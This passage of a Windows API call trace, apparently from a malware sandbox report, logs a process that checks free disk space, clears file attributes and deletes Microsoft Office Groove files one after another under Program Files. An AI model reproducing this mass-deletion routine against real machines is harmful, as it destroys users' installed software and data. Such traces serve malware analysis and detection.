lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\IMAGE.JPG", dwFileAttributes=0x80) returned 1 [0076.772] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\IMAGE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\image.jpg")) returned 1 [0076.775] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LINE.JPG", dwFileAttributes=0x80) returned 1 [0076.779] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LINE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\line.jpg")) returned 1 [0076.783] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LISTBOX.JPG", dwFileAttributes=0x80) returned 1 [0076.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LISTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\listbox.jpg")) returned 1 [0076.791] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\NUMERIC.JPG", dwFileAttributes=0x80) returned 1 [0076.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\NUMERIC.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\numeric.jpg")) returned 1 [0076.800] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\PASSWORD.JPG", dwFileAttributes=0x80) returned 1 [0076.804] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\PASSWORD.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\password.jpg")) returned 1 [0076.807] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.813] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\RADIO.JPG", dwFileAttributes=0x80) returned 1 [0076.813] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\RADIO.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\radio.jpg")) returned 1 [0076.817] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\SectionHeading.jpg", dwFileAttributes=0x80) returned 1 [0076.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\SectionHeading.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\sectionheading.jpg")) returned 1 [0076.825] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\StaticText.jpg", dwFileAttributes=0x80) returned 1 [0076.831] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\StaticText.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\statictext.jpg")) returned 1 [0076.836] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.841] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTAREA.JPG", dwFileAttributes=0x80) returned 1 [0076.841] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTAREA.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textarea.jpg")) returned 1 [0076.844] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.851] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG", dwFileAttributes=0x80) returned 1 [0076.851] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textbox.jpg")) returned 1 [0076.854] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG", dwFileAttributes=0x80) returned 1 [0076.861] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTVIEW.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textview.jpg")) returned 1 [0076.863] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0076.877] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg", dwFileAttributes=0x80) returned 1 [0076.877] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg")) returned 1 [0076.880] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.880] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.880] CoTaskMemFree (pv=0x506980) [0076.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.884] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0076.884] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0076.884] CoTaskMemFree (pv=0x506980) [0076.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0076.893] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 1 [0076.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\addtoviewarrow.jpg")) returned 1 [0076.901] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.906] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBlankPage.html", dwFileAttributes=0x80) returned 1 [0076.906] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsblankpage.html")) returned 1 [0076.908] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBrowserUpgrade.html", dwFileAttributes=0x80) returned 1 [0076.955] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsBrowserUpgrade.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsbrowserupgrade.html")) returned 1 [0076.957] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsColorChart.html", dwFileAttributes=0x80) returned 1 [0076.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsColorChart.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formscolorchart.html")) returned 1 [0076.965] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.968] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsFormTemplate.html", dwFileAttributes=0x80) returned 1 [0076.969] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsFormTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsformtemplate.html")) returned 1 [0076.971] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePage.html", dwFileAttributes=0x80) returned 1 [0076.977] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formshomepage.html")) returned 1 [0076.980] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 1 [0076.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsimagetemplate.html")) returned 1 [0076.986] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 1 [0076.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsmacrotemplate.html")) returned 1 [0076.994] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0076.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 1 [0076.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formspreviewtemplate.html")) returned 1 [0077.004] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.009] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 1 [0077.009] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsprinttemplate.html")) returned 1 [0077.014] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsVersion1Warning.htm", dwFileAttributes=0x80) returned 1 [0077.021] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsVersion1Warning.htm" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsversion1warning.htm")) returned 1 [0077.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 1 [0077.028] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewattachmenticons.jpg")) returned 1 [0077.030] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewFrame.html", dwFileAttributes=0x80) returned 1 [0077.035] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewframe.html")) returned 1 [0077.038] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.043] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewTemplate.html", dwFileAttributes=0x80) returned 1 [0077.043] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormsViewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formsviewtemplate.html")) returned 1 [0077.046] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormToolImages.jpg", dwFileAttributes=0x80) returned 1 [0077.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\formtoolimages.jpg")) returned 1 [0077.053] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0077.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 1 [0077.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg")) returned 1 [0077.060] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.060] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.060] CoTaskMemFree (pv=0x506980) [0077.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.067] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.067] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.067] CoTaskMemFree (pv=0x506980) [0077.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.069] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.069] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.069] CoTaskMemFree (pv=0x506980) [0077.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.069] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.069] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.069] CoTaskMemFree (pv=0x506980) [0077.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.071] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.071] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.071] CoTaskMemFree (pv=0x506980) [0077.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.072] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.072] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.072] CoTaskMemFree (pv=0x506980) [0077.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.073] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.073] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.073] CoTaskMemFree (pv=0x506980) [0077.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.074] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.074] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.074] CoTaskMemFree (pv=0x506980) [0077.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0077.074] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0077.074] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.074] CoTaskMemFree (pv=0x506980) [0077.075] 